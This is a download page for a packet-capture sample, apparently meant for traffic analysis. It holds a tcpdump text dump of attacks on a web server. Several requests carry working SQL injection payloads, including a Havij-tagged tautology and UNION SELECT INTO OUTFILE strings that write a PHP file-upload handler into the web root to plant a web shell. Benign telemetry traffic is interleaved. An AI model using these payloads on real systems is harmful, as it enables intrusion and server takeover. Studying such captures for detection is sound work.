Text Example

XSS SQLi Injection Web Attack PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 21
    Date added: May 24, 2019 12:02 am Added by: admin File size: 5 MB Downloads: 13

References:

https://www.reverse.it/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=5

2016-04-23 14:02:05.230289 IP 84.11.146.55.1458 > 192.168.1.124.80: Flags [P.], seq 1:292, ack 1, win 258, length 291: HTTP: GET / HTTP/1.1
E..K’.@…).T..7…|…P.v.L….P….1..GET / HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, /;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

2016-04-23 14:02:05.247929 IP 192.168.1.124.80 > 84.11.146.55.1458: Flags [.], ack 283, win 159, length 0

E..(j”@.@.(G…|T..7.P…….v.fP………….

2016-04-23 14:02:05.372530 IP 84.11.146.55.1460 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
E..(‘.@….T..7…|…P..9H>…P……. 2016-04-23 14:02:05.372850 IP 84.11.146.55.1460 > 192.168.1.124.80: Flags [P.], seq 1:306, ack 1, win 258, length 305: HTTP: GET /logo.png HTTP/1.1 E..Y’.@…).T..7…|…P..9H>…P…….GET /logo.png HTTP/1.1 Connection: close Accept: image/png, image/;q=0.8, /;q=0.5
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

2016-04-23 14:02:05.378288 IP 192.168.1.124.80 > 84.11.146.55.1460: Flags [.], ack 293, win 159, length 0

2016-04-23 14:02:38.156367 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
E..(‘.@…*.T..7…|…P.E. }..P….s..
2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij

2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0

2016-04-23 14:03:09.895806 IP 84.11.146.55.1491 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
E..((.@…*iT..7…|…P9…..W.P….Y..
2016-04-23 14:03:09.896189 IP 84.11.146.55.1491 > 192.168.1.124.80: Flags [P.], seq 1:909, ack 1, win 258, length 908: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3Chtml%3E%3Cbody%3E%3Cform+action%3D%22WSO_upload.php%22+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E++++Select+file+to+upload%3A++++%3Cinput+type%3D%22file%22+name%3D%22fileToUpload%22+id%3D%22fileToUpload%22%3E++++%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+name%3D%22submit%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_submission.php HTTP/1.1
E…(.@…&.T..7…|…P9…..W.P…w…GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3Chtml%3E%3Cbody%3E%3Cform+action%3D%22WSO_upload.php%22+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E++++Select+file+to+upload%3A++++%3Cinput+type%3D%22file%22+name%3D%22fileToUpload%22+id%3D%22fileToUpload%22%3E++++%3Cinput+type%3D%22submit%22+value%3D%22Upload+File%22+name%3D%22submit%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_submission.php HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

2016-04-23 14:03:37.804113 IP 84.11.146.55.1505 > 209.10.120.28.80: Flags [P.], seq 1:220, ack 1, win 260, length 219: HTTP: POST /e.aspx HTTP/1.1
E…2e@….&T..7.
x….P…-.p.RP…….POST /e.aspx HTTP/1.1
Accept: /
Host: mmi.cloud.avg.com
Content-Length: 87
Content-Type: application/x-www-form-urlencoded

M=66994e392ddb47cda1e0b14bd41b397c&P1=784&P2=302&D=512&C=1&UID=2147483647&Submit=Submit
2016-04-23 14:03:37.816560 IP 157.56.106.184.3544 > 84.11.146.55.63092: UDP, length 109
E ..!t..1.y..8j.T..7…t.u……cS.Fi.@…. …R.`….0:…………’b..G………………d…….:…….@@………… ….8j…… ..
2016-04-23 14:03:37.838175 IP 209.10.120.28.80 > 84.11.146.55.1505: Flags [FP.], seq 1:424, ack 220, win 512, length 423: HTTP: HTTP/1.1 200 OK

E ….@.q….

E..(h9@…c+T..7.
x….P…N….P….F..
2016-04-23 14:03:38.303665 IP 84.11.146.55.1506 > 209.10.120.30.80: Flags [P.], seq 1:450, ack 1, win 260, length 449: HTTP: POST /mw.aspx HTTP/1.1
E…h:@…aiT..7.
x….P…N….P…h…POST /mw.aspx HTTP/1.1
Accept: /
Host: prev.cloud.avg.com
Content-Length: 314
Content-Type: application/x-www-form-urlencoded

M=66994e392ddb47cda1e0b14bd41b397c&UID=2147483647&&FT=20160423T174119-0500&LT=20160423T174119-0500&T=1&A=9&C=1&S=4&X=%40EID_Id_trj%7c%25name%25%3dPSW.Generic8.ISF%7c%25idn%25%3d0b28d9f766754000%7c&U=c%3a%5cUsers%5cAlex%5cDownloads%5c000&H=63cb18cb36dc5d531ab5f8356ac542cb&Z=25927f6eb3a47e8eeb08129652188903abe39bd0
2016-04-23 14:03:38.338257 IP 209.10.120.30.80 > 84.11.146.55.1506: Flags [FP.], seq 1:190, ack 450, win 512, length 189: HTTP: HTTP/1.1 200 OK
E ….@.q..q.
x.T..7.P……….P…….HTTP/1.1 200 OK

Cache-Control: private

2016-04-23 14:03:40.593861 IP 84.11.146.55.1508 > 192.168.1.124.80: Flags [.], ack 1, win 258, length 0
E..((B@…‘T..7…|…P.E..+..KP……. 2016-04-23 14:03:40.594333 IP 84.11.146.55.1508 > 192.168.1.124.80: Flags [.], seq 1:961, ack 1, win 258, length 960: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3C%3Fphp+%24target_dir+%3D+%22uploads%2F%22%3B+%24target_file+%3D+%24target_dir+.+basename%28%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29%3B+if+%28move_uploaded_file%28%24_FILES%5B%22fileToUpload%22%5D%5B%22tmp_name%22%5D%2C+%24target_file%29%29+%7B+echo+%22The+file+%22.+basename%28+%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29.+%22+has+been+uploaded.%22%3B%7D+else+%7B+echo+%22Sorry%2C+there+was+an+error+uploading+your+file.%22%3B+%7D%3F%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_upload.php HTTP/1.1 E…(C@…&fT..7…|…P.E..+..KP…….GET /results.php?FirstName=&LastName=&Email=&SSN=%27+union+select+1%2C%27%3C%3Fphp+%24target_dir+%3D+%22uploads%2F%22%3B+%24target_file+%3D+%24target_dir+.+basename%28%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29%3B+if+%28move_uploaded_file%28%24_FILES%5B%22fileToUpload%22%5D%5B%22tmp_name%22%5D%2C+%24target_file%29%29+%7B+echo+%22The+file+%22.+basename%28+%24_FILES%5B%22fileToUpload%22%5D%5B%22name%22%5D%29.+%22+has+been+uploaded.%22%3B%7D+else+%7B+echo+%22Sorry%2C+there+was+an+error+uploading+your+file.%22%3B+%7D%3F%3E%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2FWSO_upload.php HTTP/1.1 Host: 192.168.1.124 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: htt
2016-04-23 14:03:40.594350 IP 84.11.146.55.1508 > 192.168.1.124.80: Flags [P.], seq 961:1002, ack 1, win 258, length 41: HTTP
E..Q(D@…).T..7…|…P.E.q+..KP…….p://192.168.1.124/
Connection: close

2016-04-23 14:09:41.620897 IP6 2601:240:c000:5ff0:7087:ce7f:bcb9:f90.1676 > 2001:559:19:303::17d9:8a13.80: Flags [P.], seq 192:357, ack 16836, win 258, length 165: HTTP: GET /pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/16.0.6769.2017/i321033.cab HTTP/1.1
`……@&..@.._.p……. ..Y……………P……..P…H’..GET /pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/16.0.6769.2017/i321033.cab HTTP/1.1
Connection: Keep-Alive
Host: officecdn.microsoft.com.edgesuite.net

2016-04-23 14:09:41.629096 IP 104.214.35.244.443 > 84.11.146.55.1673: Flags [.], ack 1955, win 513, length 0
E .(..@.n…h.#.T..7……Vk9u .P…}…
2016-04-23 14:09:41.631614 IP6 2001:559:19:303::17d9:8a13.80 > 2601:240:c000:5ff0:7087:ce7f:bcb9:f90.1676: Flags [.], seq 16836:18276, ack 357, win 967, length 1440: HTTP: HTTP/1.1 200 OK
b……9 ..Y…………&..@.._.p……..P……….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream

Last-Modified: Mon, 04 Apr 2016 05:52:11 GMT

2016-04-23 14:09:44.828961 IP 84.11.146.55.1677 > 207.46.101.29.80: Flags [.], ack 1, win 256, length 0
E..(‘,@…..T..7..e….P…P..NgP…5…
2016-04-23 14:09:44.829520 IP 84.11.146.55.1677 > 207.46.101.29.80: Flags [P.], seq 1:123, ack 1, win 256, length 122: HTTP: POST /UploadData.aspx HTTP/1.1
E…’-@…..T..7..e….P…P..NgP…Gi..POST /UploadData.aspx HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
Content-Length: 15234
Host: ds.ssw.live.com

Leave a Reply